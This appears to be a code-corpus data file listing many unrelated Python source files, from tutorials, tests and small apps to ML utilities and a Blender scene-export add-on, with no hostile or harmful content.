content
stringlengths 5
1.05M
|
|---|
#!/usr/bin/env python3
# switch.py by Bill Weinman [http://bw.org/]
# This is an exercise file from Python 3 Essential Training on lynda.com
# Copyright 2010 The BearHeart Group, LLC
def main():
print('this is the switch.py file')
# Equivalent to case/switch statements
choices = dict(
one = 'first',
two = 'second',
three = 'third',
four = 'fourth',
five = 'fifth'
)
# Find value for specific key
v = 'three'
print(choices[v])
# When you want a 'default'
x = 'seven'
print(choices.get(x, 'other'))
if __name__ == "__main__": main()
|
import json, pickle, time, copy
from Louis.ARC_data.objects import *
from program import *
def pickle_read(filename):
with open(filename, 'rb') as f:
ret = pickle.load(f)
return ret
def pickle_write(filename, data):
with open(filename, 'wb') as f:
pickle.dump(data, f)
def json_read(filename):
with open(filename, 'r') as f:
ret = json.load(f)
return ret
def json_write(filename, data):
with open(filename, 'w') as f:
json.dump(data, f)
def speed_test(generator, steps, show=False):
start = time.time()
for _ in range(steps):
p = next(generator)
if show: print(p)
print(time.time() - start)
def empty_grid_obj_overlap(objects):
empty = True
points = set()
for obj in objects:
x, y = obj.low
for i, j, c in obj.points:
if c != 0 and 0 <= i + x < 30 and 0 <= j + y < 30:
if (i + x, j + y) in points: raise Exception('Objects overlap')
points.add((i + x, j + y))
empty = False
if empty: raise Exception('Empty grid')
def try_pb_p(dsl, p, pb):
for mode in pb:
for pair in pb[mode]:
objects, _, _ = pair['input']
res = p.eval_naive(dsl, (copy.deepcopy(objects), None))
if res == objects: raise Exception('Identity program')
empty_grid_obj_overlap(res)
pair['output'] = res
constant = True
l = [pair['output'] for mode in pb for pair in pb[mode]]
for objects1 in l:
for objects2 in l:
if objects1 != objects2: constant = False
if constant: raise Exception('Constant program')
def pb_to_grid(pb):
for mode in pb:
for pair in pb[mode]:
objects, n, m = pair['input']
pair['input'] = objects_to_grid(objects, n, m)
try: pair['output'] = objects_to_grid(pair['output'], n, m, supple=True)
except: pair['output'] = [[]]
def appear_var(p):
if isinstance(p, Variable): return True
if isinstance(p, Lambda): return appear_var(p.body)
if isinstance(p, Function): return appear_var(p.function) or any(appear_var(arg) for arg in p.arguments)
return False
def scan_sanity(p):
if isinstance(p, Function):
if isinstance(p.function, BasicPrimitive):
if p.function.primitive == 'if':
if not appear_var(p.arguments[0]): return False
if len(p.arguments) > 2 and p.arguments[1] == p.arguments[2]: return False
if p.function.primitive == 'eq?' and len(p.arguments) > 1 and p.arguments[0] == p.arguments[1]: return False
if p.function.primitive == 'car' and p.arguments != [] and isinstance(p.arguments[0], Function) and isinstance(p.arguments[0].function, BasicPrimitive) and (p.arguments[0].function.primitive == 'singleton' or p.arguments[0].function.primitive == 'cons'): return 0
return scan_sanity(p.function) and all(scan_sanity(arg) for arg in p.arguments)
return True
|
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
from gaiatest import GaiaTestCase
from gaiatest.apps.system.regions.cards_view import CardsView
from gaiatest.apps.system.app import System
class TestCardsViewStatusbarVisibilityAccessibility(GaiaTestCase):
def setUp(self):
GaiaTestCase.setUp(self)
self.apps.launch('Calendar')
# Switch to top level frame before starting the test
self.marionette.switch_to_frame()
def test_a11y_cards_view_status_bar_visibility(self):
cards_view = CardsView(self.marionette)
status_bar = System(self.marionette).status_bar
# Pull up the cards view
self.device.hold_home_button()
cards_view.wait_for_cards_view()
# Wait for the app card ready
cards_view.wait_for_card_ready('Calendar')
# Statusbar icons should be invisible to the screen reader.
self.wait_for_condition(lambda m: status_bar.is_status_bar_maximized_wrapper_a11y_hidden)
self.wait_for_condition(lambda m: status_bar.is_status_bar_minimized_wrapper_a11y_hidden)
|
from src.cart import CartProduct
from src.product.products import Product
class Client(object):
def __init__(self, name, wallet=None):
"""
Supermarket client
>>> wilson = Client(name='Wilson', wallet=10.00)
>>> sweet_potato = Product(name='sweet_potato', sku='001', price=1.00, cost=0.50, stock_quantity=100, unit='Kg')
>>> cart_sweet_potato = CartProduct(product=sweet_potato, quantity=1)
>>> wilson.add_product_to_cart(cart_sweet_potato, 1)
>>> wilson.pay()
"""
self.name: str = name
self.cart: set = set()
self.wallet: float = wallet
@staticmethod
def _create_cart_product(added_product: Product, added_quantity: int) -> CartProduct:
"""
Creates a cart product with given product and quantity
:param added_product: Product that will be used to create the cart product
:param added_quantity: Quantity of the product
:return: Cart product
"""
return CartProduct(product=added_product, quantity=added_quantity)
def _search_product(self, product: Product) -> CartProduct:
"""Searches the cart for the given product"""
for cart_product in self.cart:
if cart_product.product == product:
return cart_product
def add_product_to_cart(self, added_product: Product, added_quantity: int):
"""Adds a given product to client cart"""
cart_product = self._search_product(added_product)
if cart_product:
cart_product.increase_quantity(added_quantity=added_quantity)
else:
cart_product = self._create_cart_product(added_product, added_quantity)
self.cart.add(cart_product)
def remove_product_from_cart(self, product: Product, removed_quantity: int):
cart_product = self._search_product(product)
if removed_quantity == cart_product.quantity:
self.cart.remove(cart_product)
cart_product.restore_item_to_stock(removed_quantity)
@staticmethod
def _handle_bundle_price(total_price: float, cart_product: CartProduct) -> float:
not_in_bundle_quantity = cart_product.quantity % cart_product.product.bundle_discount.bundle_quantity
bundle_products_quantity = cart_product.quantity // cart_product.product.bundle_discount.bundle_quantity
total_price += ((cart_product.product.price * not_in_bundle_quantity) +
(cart_product.product.bundle_discount.bundle_price *
bundle_products_quantity *
cart_product.product.bundle_discount.bundle_quantity))
return total_price
def _calculate_cart_price(self) -> float:
"""Calculates the cart total value"""
total_price = 0
for cart_product in self.cart:
if cart_product.product.bundle_discount:
total_price = self._handle_bundle_price(total_price, cart_product)
else:
total_price += (cart_product.product.price * cart_product.quantity)
return total_price
def pay(self):
"""
Pays for the cart total value
:raises Exception: When the client has no money
"""
total_price = self._calculate_cart_price()
if total_price > self.wallet:
raise Exception('Not enough money in the wallet!')
self.wallet -= total_price
|
import sqlite3
# form connection to 'demo_data' sqlite3 db
conn = sqlite3.connect('demo_data.sqlite3')
# create cursor
curs = conn.cursor()
# set schema for the 'demo' table
create_demo_table = ("""
CREATE TABLE demo (
s CHAR(1),
x INT,
y INT
)
""")
# create the table in demo_data db
curs.execute(create_demo_table)
# insert data into the 'demo' table
insert_data = """
INSERT INTO demo (s, x, y)
VALUES ('g', 3, 9), ('v', 5, 7), ('f', 8, 7);
"""
curs.execute(insert_data)
# save changes
conn.commit()
## test queries to make sure that everything worked
#how many rows? - 3
test_1 = ("SELECT COUNT(*) FROM demo")
print("How many rows?: ", curs.execute(test_1).fetchone())
#How many rows are there where both x and y are at least 5?
test_2 = ("SELECT COUNT(*) FROM demo WHERE x >= 5 AND y >= 5")
print("How many rows where 'x' and 'y' at least 5: ", curs.execute(test_2).fetchone())
#How many unique values of y are there (hint - COUNT() can accept
#a keyword DISTINCT)?
test_3 = ("SELECT DISTINCT COUNT(y) FROM demo")
print("How many distinct 'y'?: ", curs.execute(test_3).fetchone())
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import numpy as np
import time
import sys
import paddle
import paddle.fluid as fluid
#import reader_cv2 as reader
import reader as reader
import argparse
import functools
from utility import add_arguments, print_arguments
import math
parser = argparse.ArgumentParser(description=__doc__)
add_arg = functools.partial(add_arguments, argparser=parser)
# yapf: disable
add_arg('pretrained_model', str, None, "Whether to use pretrained model.")
add_arg('saved_model', str, "new_model", "Where saved model.")
add_arg('model', str, "SE_ResNeXt50_32x4d", "Set the network to use.")
add_arg('model_category', str, "models_name", "Whether to use models_name or not, valid value:'models','models_name'." )
# yapf: enable
def set_models(model_category):
global models
assert model_category in ["models", "models_name"
], "{} is not in lists: {}".format(
model_category, ["models", "models_name"])
if model_category == "models_name":
import models_name as models
else:
import models as models
def save(args):
# parameters from arguments
class_dim = 1000
model_name = args.model
pretrained_model = args.pretrained_model
with_memory_optimization = True
image_shape = [3,224,224]
model_list = [m for m in dir(models) if "__" not in m]
assert model_name in model_list, "{} is not in lists: {}".format(args.model,
model_list)
image = fluid.layers.data(name='image', shape=image_shape, dtype='float32')
label = fluid.layers.data(name='label', shape=[1], dtype='int64')
# model definition
model = models.__dict__[model_name]()
if model_name == "GoogleNet":
out0, out1, out2 = model.net(input=image, class_dim=class_dim)
cost0 = fluid.layers.cross_entropy(input=out0, label=label)
cost1 = fluid.layers.cross_entropy(input=out1, label=label)
cost2 = fluid.layers.cross_entropy(input=out2, label=label)
avg_cost0 = fluid.layers.mean(x=cost0)
avg_cost1 = fluid.layers.mean(x=cost1)
avg_cost2 = fluid.layers.mean(x=cost2)
avg_cost = avg_cost0 + 0.3 * avg_cost1 + 0.3 * avg_cost2
acc_top1 = fluid.layers.accuracy(input=out0, label=label, k=1)
acc_top5 = fluid.layers.accuracy(input=out0, label=label, k=5)
else:
out = model.net(input=image, class_dim=class_dim)
cost, pred = fluid.layers.softmax_with_cross_entropy(
out, label, return_softmax=True)
avg_cost = fluid.layers.mean(x=cost)
acc_top1 = fluid.layers.accuracy(input=pred, label=label, k=1)
acc_top5 = fluid.layers.accuracy(input=pred, label=label, k=5)
test_program = fluid.default_main_program().clone(for_test=True)
fetch_list = [avg_cost.name, acc_top1.name, acc_top5.name]
if with_memory_optimization:
fluid.memory_optimize(
fluid.default_main_program(), skip_opt_set=set(fetch_list))
place = fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
if pretrained_model:
def if_exist(var):
return os.path.exists(os.path.join(pretrained_model, var.name))
fluid.io.load_vars(exe, pretrained_model, predicate=if_exist)
val_reader = paddle.batch(reader.val(), batch_size=1)
feeder = fluid.DataFeeder(place=place, feed_list=[image, label])
fluid.io.save_inference_model(args.saved_model, ['image', 'label'], [test_program.current_block().var(i) for i in fetch_list], exe, test_program)
print("Save done.")
def main():
args = parser.parse_args()
print_arguments(args)
set_models(args.model_category)
save(args)
if __name__ == '__main__':
main()
|
import os
from http import HTTPStatus
from flask import request
from flask_cors import cross_origin
from app.controllers.hodler import HodlerController
from app.controllers.token import TokenController
from app.controllers.watcher import WatcherController
from app.tasks.blockchain import (
blockchain_events_sync_all_contracts,
blockchain_events_sync_one_contract,
)
from app.utils.session import SessionManager
from flask_app import app
db_uri = os.environ.get('DATABASE_URL', None)
if not db_uri:
app.logger.error('DATABASE_URL is not set')
SessionManager.configure(db_uri)
@app.route('/api/tokens', methods=['POST'])
@cross_origin()
def create_tokens():
payload = request.json
app.logger.info(f'Token Creation Request: {payload["name"]}')
token_ctl = TokenController()
token_ctl.create_token(payload)
return {'code': HTTPStatus.CREATED}
@app.route('/api/tokens/edit', methods=['POST'])
@cross_origin()
def update_token():
payload = request.json
token_ctl = TokenController()
token_ctl.edit_token(payload)
return {'code': HTTPStatus.OK}
@app.route('/api/hodlers', methods=['GET'])
@cross_origin()
def get_top_hodlers():
token_name = request.args.get('token')
limit = int(request.args.get('limit', 100))
hodler_ctl = HodlerController()
hodlers = hodler_ctl.find_top_hodler_by_token_name(token_name, limit)
return {'code': HTTPStatus.OK, 'hodlers': hodlers}
@app.route('/api/tokens', methods=['GET'])
@cross_origin()
def get_tokens():
token_ctl = TokenController()
tokens = token_ctl.get_tokens()
return {'code': HTTPStatus.OK, 'tokens': [token.to_dict() for token in tokens]}
@app.route('/api/blockchain_sync', methods=['POST'])
@cross_origin()
def blockchain_sync():
blockchain_events_sync_all_contracts.apply()
return {'code': HTTPStatus.ACCEPTED}
@app.route('/api/watchers', methods=['POST'])
@cross_origin()
def upsert_watcher():
payload = request.json
app.logger.info(f'Watcher Upsert Request: {payload["address"]}')
watcher_ctl = WatcherController()
watcher_ctl.upsert_watcher(payload)
return {'code': HTTPStatus.CREATED}
@app.route('/api/tokens/sync', methods=['POST'])
@cross_origin()
def sync_token():
payload = request.json
token_ctl = TokenController()
token = token_ctl.get_token_by_name(payload['name'])
blockchain_events_sync_one_contract.apply(args=[token.to_dict()])
return {'code': HTTPStatus.ACCEPTED}
if __name__ == '__main__':
app.run()
|
import json
import logging
import mongoengine as me
import rmc.shared.util as util
class AggregateRating(me.EmbeddedDocument):
rating = me.FloatField(min_value=0.0, max_value=1.0, default=0.0)
count = me.IntField(min_value=0, default=0)
sorting_score_positive = me.FloatField(
min_value=0.0, max_value=1.0, default=0.0)
sorting_score_negative = me.FloatField(
min_value=0.0, max_value=1.0, default=0.0)
def debug_logging(self, func_name):
# TODO(Sandy): Temporary debugging for over 100% average rating bug
if self.rating > 1:
logging.warn(
"%s: update_sorting_score will fail" % (func_name) +
" self.count=%s self.rating=%s" % (self.count, self.rating)
)
@property
def num_approves(self):
"""Returns the number of users who selected "yes" for this rating."""
return int(round(self.rating * self.count))
def update_sorting_score(self):
self.sorting_score_positive = util.get_sorting_score(
self.rating, self.count)
self.sorting_score_negative = util.get_sorting_score(
1 - self.rating, self.count)
def add_rating(self, rating):
self.rating = float(self.num_approves + rating) / (self.count + 1)
self.count += 1
# TODO(Sandy): Temporary debugging
self.debug_logging("add_rating(%s)" % (rating))
self.update_sorting_score()
def remove_rating(self, rating):
if self.count == 0:
logging.warn(
"AggregateRating: called remove_rating with count = 0")
return
if self.count == 1:
self.rating = 0.0
else:
self.rating = float(self.num_approves - rating) / (self.count - 1)
self.count -= 1
# TODO(Sandy): Temporary debugging
self.debug_logging("remove_rating(%s)" % (rating))
self.update_sorting_score()
def add_aggregate_rating(self, ar):
if ar.count == 0:
return
total = ar.rating * ar.count
self.rating = (float(self.num_approves + total) /
(self.count + ar.count))
self.count += ar.count
# TODO(Sandy): Temporary debugging
self.debug_logging("add_aggregate_rating(%s)" % (ar))
self.update_sorting_score()
def to_dict(self):
return {
'rating': self.rating,
'count': self.count,
}
def to_json(self):
return json.dumps(self.to_dict())
def update_aggregate_after_replacement(self, old_value, new_value):
if old_value is None and new_value is None:
# Rating not changed
pass
elif old_value is None:
# New rating, add new_value to the aggregate
self.add_rating(new_value)
elif new_value is None:
# Removed a rating, remove old_value from the aggregate
self.remove_rating(old_value)
elif old_value != new_value:
# Modified a rating, removing old_value and add new_value to the
# aggregate
self.remove_rating(old_value)
self.add_rating(new_value)
@classmethod
def from_json(cls, json_str):
obj = json.loads(json_str)
return cls(**obj)
# TODO(david): Does not make sense to make aggregate rating from one rating
@classmethod
def from_single_rating(cls, value):
return cls(rating=value, count=1)
def get_overall_rating(ar_ratings):
sum_ratings = sum(r['rating'] * r['count'] for r in ar_ratings)
num_ratings = sum(r['count'] for r in ar_ratings)
return AggregateRating(
count=max(r['count'] for r in ar_ratings) if ar_ratings else 0,
rating=sum_ratings / max(num_ratings, 1),
)
|
# pylint: disable=invalid-name,no-self-use
import json
import os
import numpy
from numpy.testing import assert_almost_equal
from deep_qa.run import compute_accuracy
from deep_qa.run import run_model_from_file, load_model, evaluate_model
from deep_qa.run import score_dataset, score_dataset_with_ensemble
from deep_qa.testing.test_case import DeepQaTestCase
class TestRun(DeepQaTestCase):
# Our point here is mostly just to make sure the scripts don't crash.
def setUp(self):
super(TestRun, self).setUp()
self.write_true_false_model_files()
model_params = self.get_model_params({"model_class": "ClassificationModel",
'save_models': True})
self.param_path = os.path.join(self.TEST_DIR, "params.json")
with open(self.param_path, "w") as file_path:
json.dump(model_params.as_dict(), file_path)
def test_run_model_does_not_crash(self):
run_model_from_file(self.param_path)
def test_load_model_does_not_crash(self):
run_model_from_file(self.param_path)
loaded_model = load_model(self.param_path)
assert loaded_model.can_train()
def test_score_dataset_does_not_crash(self):
run_model_from_file(self.param_path)
score_dataset(self.param_path, [self.TEST_FILE])
def test_evalaute_model_does_not_crash(self):
run_model_from_file(self.param_path)
evaluate_model(self.param_path, [self.TEST_FILE])
def test_score_dataset_with_ensemble_gives_same_predictions_as_score_dataset(self):
# We're just going to test something simple here: that the methods don't crash, and that we
# get the same result with an ensemble of one model that we do with `score_dataset`.
run_model_from_file(self.param_path)
predictions, _ = score_dataset(self.param_path, [self.TEST_FILE])
ensembled_predictions, _ = score_dataset_with_ensemble([self.param_path], [self.TEST_FILE])
assert_almost_equal(predictions, ensembled_predictions)
def test_compute_accuracy_computes_a_correct_metric(self):
predictions = numpy.asarray([[.5, .5, .6], [.1, .4, .0]])
labels = numpy.asarray([[1, 0, 0], [0, 1, 0]])
assert compute_accuracy(predictions, labels) == .5
|
#!/usr/bin/env python
"""
MySQL implementation of GetChecksum
"""
from WMCore.Database.DBFormatter import DBFormatter
class GetChecksum(DBFormatter):
sql = """SELECT cst.type AS cktype, fcs.cksum AS cksum FROM
wmbs_file_checksums fcs INNER JOIN
wmbs_checksum_type cst
ON fcs.typeid = cst.id
WHERE fcs.fileid = :fileid"""
def formatResult(self, result):
"""
I need the result in a reasonable list.
This will return None if there is no cksum
"""
formattedResult = {}
dictVersion = DBFormatter.formatDict(self, result)
if type(dictVersion) == type([]):
if len(dictVersion) == 0:
#Then it's empty
return None
else:
#Otherwise there are several, and we have to record each one
#I don't know how to do this yet.
tmpDict = {}
for entry in dictVersion:
tmpDict.update({entry.get('cktype', 'Default'): entry.get('cksum', None)})
formattedResult['checksums'] = tmpDict
else:
formattedResult['checksums'] = {'Default': dictVersion.get('cksum', None)}
if formattedResult == {'Default': None}:
#Then the thing was empty anyway
return None
return formattedResult
def execute(self, fileid = None, bulkList = None, conn = None, transaction = False):
if bulkList:
#Would need to accept a bulk list of form [{fileid: fileid}]
binds = bulkList
else:
binds = {'fileid': fileid}
result = self.dbi.processData(self.sql, binds,
conn = conn, transaction = transaction)
return self.formatResult(result)
|
from nose.tools import (
eq_,
set_trace,
)
from ...util.web_publication_manifest import (
JSONable,
Manifest,
AudiobookManifest,
)
from .. import DatabaseTest
class TestJSONable(object):
class Mock(JSONable):
@property
def as_dict(self):
return dict(value=1)
def test_as_dict(self):
eq_(u'{"value": 1}', unicode(self.Mock()))
def test_json_ready(self):
m = JSONable.json_ready
eq_(1, m(1))
mock = self.Mock()
eq_(dict(value=1), m(mock))
eq_([dict(value=1), dict(value=1)], m([mock, mock]))
class TestManifest(object):
def test_defaults(self):
eq_("http://schema.org/Book", Manifest.DEFAULT_TYPE)
eq_("http://readium.org/webpub/default.jsonld",
Manifest.DEFAULT_CONTEXT)
manifest = Manifest()
eq_(Manifest.DEFAULT_CONTEXT, manifest.context)
eq_(Manifest.DEFAULT_TYPE, manifest.type)
eq_(
{
'@context' : manifest.context,
'metadata' : {'@type': manifest.type}
},
manifest.as_dict
)
def test_add_link(self):
manifest = Manifest()
manifest.add_link("http://foo/", "self", extra="value")
dict = manifest.as_dict
eq_(
[{'href': 'http://foo/', 'rel': 'self', 'extra': 'value'}],
dict['links']
)
def test_add_reading_order(self):
manifest = Manifest()
manifest.add_reading_order("http://foo/", "text/html", "Chapter 1",
extra="value")
dict = manifest.as_dict
eq_(
[{'href': 'http://foo/', 'type': 'text/html', 'title': 'Chapter 1',
'extra': 'value'}],
dict['readingOrder']
)
def test_add_resource(self):
manifest = Manifest()
manifest.add_resource("http://foo/", "text/html", extra="value")
dict = manifest.as_dict
eq_(
[{'href': 'http://foo/', 'type': 'text/html', 'extra': 'value'}],
dict['resources']
)
def test_null_properties_not_propagated(self):
manifest = Manifest()
additional_properties = dict(extra="value", missing=None)
manifest.add_link("http://foo/", "self", **additional_properties)
manifest.add_reading_order("http://foo/", "text/html", "Chapter 1", **additional_properties)
manifest.add_resource("http://foo/", "text/html", **additional_properties)
manifest_dict = manifest.as_dict
top_level_properties = ["links", "readingOrder", "resources"]
for prop in top_level_properties:
[entry] = manifest_dict["links"]
assert "extra" in entry
eq_("value", entry["extra"])
assert "missing" not in entry
class TestUpdateBibliographicMetadata(DatabaseTest):
def test_update(self):
edition, pool = self._edition(with_license_pool=True)
edition.cover_thumbnail_url = self._url
[author] = edition.contributors
manifest = Manifest()
manifest.update_bibliographic_metadata(pool)
metadata = manifest.metadata
eq_(edition.title, metadata['title'])
eq_(pool.identifier.urn, metadata['identifier'])
# The author's sort name is used because they have no display
# name.
eq_([author.sort_name], metadata['author'])
# The language has been converted from ISO-3166-1-alpha-3 to
# ISO-3166-1-alpha-2.
eq_("en", metadata['language'])
[cover_link] = manifest.links
eq_('cover', cover_link['rel'])
eq_(edition.cover_thumbnail_url, cover_link['href'])
# Add an author's display name, and it is used in preference
# to the sort name.
author.display_name = "a display name"
manifest = Manifest()
manifest.update_bibliographic_metadata(pool)
eq_(["a display name"], manifest.metadata['author'])
# If the pool has no presentation edition, the only information
# we get is the identifier.
pool.presentation_edition = None
manifest = Manifest()
manifest.update_bibliographic_metadata(pool)
eq_(pool.identifier.urn, metadata['identifier'])
for missing in ['title', 'language', 'author']:
assert missing not in manifest.metadata
eq_([], manifest.links)
class TestAudiobookManifest(object):
def test_defaults(self):
eq_("http://bib.schema.org/Audiobook", AudiobookManifest.DEFAULT_TYPE)
eq_("http://readium.org/webpub/default.jsonld",
AudiobookManifest.DEFAULT_CONTEXT)
manifest = AudiobookManifest()
eq_(AudiobookManifest.DEFAULT_CONTEXT, manifest.context)
eq_(AudiobookManifest.DEFAULT_TYPE, manifest.type)
eq_(
{
'@context' : manifest.context,
'metadata' : {'@type': manifest.type}
},
manifest.as_dict
)
|
def get_type(value):
try:
int(value)
return "int"
except ValueError:
try:
float(value)
return "float"
except ValueError:
return "string"
if __name__ == '__main__':
input_value = input("Enter value: ")
print(get_type(input_value))
input_value = input("Enter value: ")
print(get_type(input_value))
input_value = input("Enter value: ")
print(get_type(input_value))
|
# -*- coding: utf-8 -*-
"""Runs various benchmarks on the Yaklient package"""
|
class Car:
def __init__(self, make, model, year):
self.make = make
self.model = model
self.year = year
self.odometer_reading = 0 # 默认实例变量
def get_describe_name(self):
"""
打印车子的基本信息
:return: long_name
"""
long_name = f"{self.year} {self.make} {self.model}"
return long_name.title()
def print_odometer(self):
"""
打印车子公里数
:return: none
"""
print(f"This car has {self.odometer_reading} miles on it")
def update_odometer(self, new_mile):
"""
在外部调用方法,经过逻辑验证之后,设置新的英里数
:param new_mile: 新的英里数
:return: none
"""
if new_mile >= self.odometer_reading:
self.odometer_reading = new_mile # 通过方法,修改实例变量
else:
print("you can not roll back an odometer!")
def fill_gas_tank(self):
print("your gas tank has been filled.")
# 继承,创建子类
class ElectricCar(Car):
def __init__(self, make, model, year, remaining_battery):
"""
继承父类Car的实例变量和方法
:param make:
:param model:
:param year:
"""
super().__init__(make, model, year) # 所有的父类实例变量、方法都会继承
self.battery_size = 70 # 默认子类实例变量
self.remaining_battery = remaining_battery # 子类自定义实例变量
def describe_battery(self):
"""
子类方法:打印电池容量
:return: none
"""
print(f"This car has a {self.battery_size} -kWh battery")
def read_remaining_battery(self):
"""
子类方法,打印剩余电量
:return: none
"""
print(f"This car has {self.remaining_battery} % battery left")
def fill_gas_tank(self): # 重写父类方法
print("Electric car doesn't have gas tank!")
my_tesla = ElectricCar('tesla', 'ModelX', 2020, 90)
print(my_tesla.get_describe_name()) # 调用父类的方法
my_tesla.update_odometer(13000) # 调用父类的方法
my_tesla.print_odometer() # 调用父类的方法
my_tesla.describe_battery() # 调用子类方法
my_tesla.read_remaining_battery() # 调用子类方法
my_tesla.fill_gas_tank() # 调用经过重写的父类方法
|
from chainer.backends import cuda
from chainerkfac.optimizers.fisher_block import compute_pi
from chainerkfac.optimizers.fisher_block import FisherBlock
class FisherBlockConnection(FisherBlock):
def __init__(self, *args, **kwargs):
self._A = None
self._G = None
super(FisherBlockConnection, self).__init__(*args, **kwargs)
@property
def cov_forward(self):
return self.covs[0]
@property
def cov_backward(self):
return self.covs[1]
@property
def inv_forward(self):
return self.invs[0]
@property
def inv_backward(self):
return self.invs[1]
def is_mine(self, func, in_data, out_grad_data=None):
if not isinstance(func, self.funcclass):
return False
if in_data[1] is not self.link.W.data:
return False
return True
def forward_postprocess(self, func, in_data):
self._A = self.compute_A(in_data)
self.covs = [self._A, self._G]
def backward_preprocess(self, func, in_data, out_grad_data):
self._G = self.compute_G(in_data, out_grad_data)
self.covs = [self._A, self._G]
def compute_A(self, in_data):
raise NotImplementedError
def compute_G(self, in_data, out_grad_data):
raise NotImplementedError
def update_kfgrads(self):
self.check_attr('invs')
W = self.link.W
b = self.link.b
invs = self.invs
kfgrads = self.compute_kfgrads(W, b, invs)
if b is not None:
W.kfgrad = kfgrads[:, :-1].reshape(W.shape)
b.kfgrad = kfgrads[:, -1].reshape(b.shape)
else:
W.kfgrad = kfgrads.reshape(W.shape)
def compute_kfgrads(self, W, b, invs):
raise NotImplementedError
def get_diagvals(self):
A, G = self.cov_emas
xp = cuda.get_array_module(A)
rW = self.get_diagval('W') ** 0.5
diagvalsA = rW * xp.ones(A.shape[0])
diagvalsG = rW * xp.ones(G.shape[0])
if self.link.b is not None:
diagvalsA[-1] = rW
pi = compute_pi(A, G, self._pi_type)
setattr(self, 'diag_val_forward', pi * rW)
setattr(self, 'diag_val_backward', (1 / pi) * rW)
return [pi * diagvalsA, (1 / pi) * diagvalsG]
|
from bpy_extras.io_utils import ExportHelper
from bpy.props import StringProperty, BoolProperty, EnumProperty
from bpy.types import Operator
import bpy
import os
import re
import uuid
import mathutils
import json
bl_info = {
"name": "Export to ARENA (to folder)",
"author": "Nuno Pereira",
"version": (0, 1, 2),
"blender": (2, 93, 5),
"location": "File > Export > ARENA Scene (to folder)",
"description": "Export > ARENA Scene (to folder)",
"warning": "",
"category": "Import-Export"
}
def export_arena_scene(context, scene_id, filepath, arena_username, arena_realm, filestore_path, check_existing, export_format, export_selection, export_animations, export_extras, export_draco_mesh_compression_enable):
print("export... ", filepath)
gltf_ext = 'gltf'
if export_format == 'GLB': gltf_ext = 'glb'
export_objs = []
if export_selection:
export_objs = [obj for obj in bpy.context.selected_objects if obj.parent == None]
else:
export_objs = [obj for obj in bpy.context.scene.collection.all_objects if obj.parent == None]
# save file
if bpy.data.filepath:
bpy.ops.wm.save_as_mainfile(filepath=bpy.data.filepath)
arena_objects = []
# iterate collections
for obj in export_objs:
obj_name = re.sub('_+', '_', re.sub('\W', '_', obj.name).lower())
gltf_filepath = os.path.join(filepath, obj_name)
print("export... ", gltf_filepath)
# clear selected objects
bpy.ops.object.select_all(action='DESELECT')
# select object hierarchy
for cobj in obj.children: cobj.select_set(True)
obj.select_set(True)
obj.rotation_mode = 'QUATERNION'
# save location and rotation and move object to origin
saved_loc = obj.matrix_world.to_translation()
saved_rot = obj.matrix_world.to_quaternion()
obj.location = (0, 0, 0)
obj.rotation_quaternion = (1, 0, 0, 0)
bpy.ops.export_scene.gltf(
filepath=gltf_filepath,
check_existing=check_existing,
export_format=export_format,
export_animations=export_animations,
export_extras=export_extras,
export_draco_mesh_compression_enable=export_draco_mesh_compression_enable,
use_selection = True,
)
obj.location = saved_loc
obj.rotation_quaternion = saved_rot
arena_objects.append({
"namespace": arena_username,
"realm": arena_realm,
"sceneId": scene_id,
"object_id": f'be_{scene_id}_{obj_name}',
"persist": True,
"type": "object",
"action": "create",
"attributes": {
"object_type": "gltf-model",
"url": f'/store/users/{arena_username}/blender-exports/{scene_id}/{obj_name}.{gltf_ext}',
"position": {
"x": saved_loc[0],
"y": saved_loc[2],
"z": saved_loc[1] * -1
},
"rotation": {
"x": saved_rot[1],
"y": saved_rot[3],
"z": saved_rot[2] * -1,
"w": saved_rot[0]
},
"scale": {
"x": 1,
"y": 1,
"z": 1
}
}
})
msg = f'Copy folder ({filepath}) to the ARENA filestore at {filestore_path}/{scene_id})'
show_message_box(title="ARENA Export", icon='INFO', lines=("ARENA Scene Exported",msg))
context.workspace.status_text_set(f'ARENA Scene Exported. NOTE: {msg}')
json_filepath = os.path.join(filepath, 'scene.json')
f = open(json_filepath, 'w', encoding='utf-8')
f.write(json.dumps(arena_objects))
f.close()
return {'FINISHED'}
def username_update(self, context):
self.filestore_path=f'/store/user/{self.arena_username}/blender-exports'
class ExportARENAScene(Operator, ExportHelper):
"""This appears in the tooltip of the operator and in the generated docs"""
bl_idname = "export_arena.scene"
bl_label = "Export to Folder"
bl_options = {'UNDO'}
filename_ext = ''
# List of operator properties
export_format: EnumProperty(
name="Format",
description="Choose Asset Format",
items=(
('GLB', "GLB", "GLB"),
('GLTF_EMBEDDED', "GLTF Embedded", "GLTF Embedded"),
('GLTF_SEPARATE', "GLTF Seperate", "GLTF Seperate"),
),
default='GLB',
)
arena_username: StringProperty(
name="ARENA Username",
description="ARENA Username; Used for the filestore path below (assets uploaded to the filestore)",
default='wiselab',
maxlen=100,
update=username_update
)
arena_realm: StringProperty(
name="ARENA Realm",
description="ARENA Realm; Used to create the json file",
default='realm',
maxlen=100
)
export_selection: BoolProperty(
name="Export Selection",
description="Export selected objects only",
default=False,
)
export_animations: BoolProperty(
name="Export Animations",
description="Exports active actions and NLA tracks as glTF animations",
default=True,
)
export_extras: BoolProperty(
name="Export Extras",
description="Export custom properties as glTF extras",
default=True,
)
export_draco_mesh_compression_enable: BoolProperty(
name="Draco Compression",
description="Compress mesh using Draco",
default=False,
)
filestore_path: StringProperty(
name="Filestore Path",
description="ARENA filestore path to where assets will be uploaded (defaults to <filestore-home>/blender-exports)",
default='/store/user/wiselab/blender-exports',
maxlen=300
)
def execute(self, context):
create_folder_if_does_not_exist(self.filepath)
self.scene_id = os.path.basename(self.filepath)
return export_arena_scene(
context,
self.scene_id,
self.filepath,
self.arena_username,
self.arena_realm,
self.filestore_path,
self.check_existing,
self.export_format,
self.export_selection,
self.export_animations,
self.export_extras,
self.export_draco_mesh_compression_enable
)
def invoke(self, context, event):
self.scene_id = f'untitled-scene'
self.filepath = self.scene_id
context.window_manager.fileselect_add(self)
return {'RUNNING_MODAL'}
def create_folder_if_does_not_exist(folder_path):
if os.path.isdir(folder_path):
return
os.mkdir(folder_path)
def show_message_box(title = "Message Box", icon = 'INFO', lines=""):
myLines=lines
def draw(self, context):
for n in myLines:
self.layout.label(text=n)
